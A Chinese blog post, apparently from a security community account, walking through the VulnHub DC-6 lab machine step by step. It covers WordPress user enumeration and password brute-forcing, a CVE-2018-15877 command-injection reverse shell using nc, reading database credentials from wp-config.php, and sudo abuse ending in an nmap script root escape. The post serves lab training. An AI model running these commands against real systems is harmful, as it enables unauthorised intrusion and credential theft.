点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
DC-6打靶记录
靶机获取地址
https://www.vulnhub.com/entry/dc-6,315/信息收集
ip探测
arp-scan -l
发现目标ip为192.168.111.243
端口探测
nmap -A -p 1-65535 192.168.111.243
探测目标端口为22(ssh),80(http)。
ssh爆破
用超级弱口令工具或者hydra爆破
并没有爆破出来
漏洞利用
所以只能走80端口
又是一个wordpress网站
然后就尝试在
searchsploit wordpress 5.1.1
还有msf上面就没有可利用的 然后想想它既然有那么多插件 会不会从插件上面找带切入点
于是利用wpscan老牌劲旅来查找可利用点
wpscan --url http://wordy/ -e ap -e vt -e u 枚举用户名,主题,插件漏洞
有一个主题twentyseventeen
没有扫出来插件
而且主页面翻译之后也说他们最安全的插件什么什么的
查看主题是否有漏洞
searchsploit twentyseventeen
然而并没有鹅
这时候看见靶机主界面有
根据这个提示 很有可能需要我们爆破后台
cat ./rockyou.txt | grep k01 > passwords.txt
然后把我们上面枚举出来的用户名放在1.txt文件夹里面
用wpscan去爆破
成功跑出来
mark / helpdesk01
访问http://wordy/wp-login.php
成功登录
getshell
后来查资料发现
存在cve-2018-15877 命令执行
然后就去
searchsploit wordpress Activity Monitor
然而第一个不能用,第二个获取的shell不稳定 执行特殊命令直接就掉了
尝试在msf上面搜
然而这个是获取不了shell 无果 继续在网上找
查cve相关知识
发现输入框这里抓包就能执行命令
输入东西 然后点击 LOOKUP 抓包
在这里输入命令
nc 192.168.111.129 9999 -e sh
然后在kali上面输入
nc -lvp 9999
但是不知道为什么一连接就会掉
后来把nc的命令改成了
nc 192.168.111.129 9999 -e /bin/bash
就好了
然后用
python2 -c 'import pty;pty.spawn("/bin/bash")'
提供shell
提权
登录数据库
因为worepress 有配置数据库配置文件 其位于worepress的根目录下(/var/www/html)
cd /var/www/html
ls
cat wp-config.php
里面有数据库的配置文件 账号密码之类的
看样子mysql数据库只允许本地登录
尝试登录上去
mysql -u wpdbuser -p
meErKatZ
然后一步步的 搜数据库 表名 列名 具体数据
然而有 wpscan枚举的用户名 和对应密码 只不过都加密了
无果
然后这时候想到能不能用su 切换用户到mark
su mark
helpdesk01
总而言之就是登录不上去
然后"经典提权三步走"
查看具有sudo权限的二进制文件
sudo -l
要密码 寄
查看具有suid权限的二进制文件
find / -perm -u=s -type f 2>/dev/null
好像都不能用 emmm
经典的
cat /etc/passwd
查看/home目录下的各用户下的文件
cat /home/jens
是个文件夹
查看里面的东西
ls /home/jens
发现有个文件
ls -la /home/jens
所属于jens 但是我们能看 (里面东西我改了,也没啥有用的)
继续尝试查看home目录下其他用户的文件
/home/mark下面有个stuff文件夹
继续查看
里面有添加的新用户
graham/GSo7isUM1D4
登录上去查看查看
经典sudo -l
发现graham在上面发现的backups.sh,graham有jens的权限
同时查看id
graham跟jens还是一个用户组
cd /home/jens
现在利用该文件然后切换为jens用户
echo "/bin/bash" > b*
sudo -u jens ./*
正常来说 sudo -u jens 执行./* 需要jens的密码 然后以jens的权限执行文件
但是对于本用户来说 jens 并不需要密码就能执行这个文件
继续sudo -l
jens能够以root权限无密码执行nmap
查看nmap版本
nmap -v
7.40
交互模式在版本 2.02 至 5.21 上可用
所以需要换个
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
获取Flag
欢迎关注SecHub网络安全社区,SecHub网络安全社区目前邀请式注册,邀请码获取见公众号菜单【邀请码】
#
企业简介
赛克艾威 - 专注政企安全服务
北京赛克艾威科技有限公司(简称:赛克艾威),成立于2016年9月,具有中国网络安全审查技术与认证中心安全风险评估服务三级资质CCRC,信息安全保障人员资质CISAW(安全评估专家级)。
安全评估|渗透测试|漏洞扫描|安全巡检
代码审计|钓鱼演练|应急响应|安全运维
重大时刻安保|企业安全培训
联系方式
电话|010-86460828
官网|https://sechub.com.cn
关注我们
公众号:sechub安全
哔哩号:SecHub官方账号
原文始发于微信公众号(SecHub网络安全社区):红队打靶 | vulnhub系列:DC-6
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论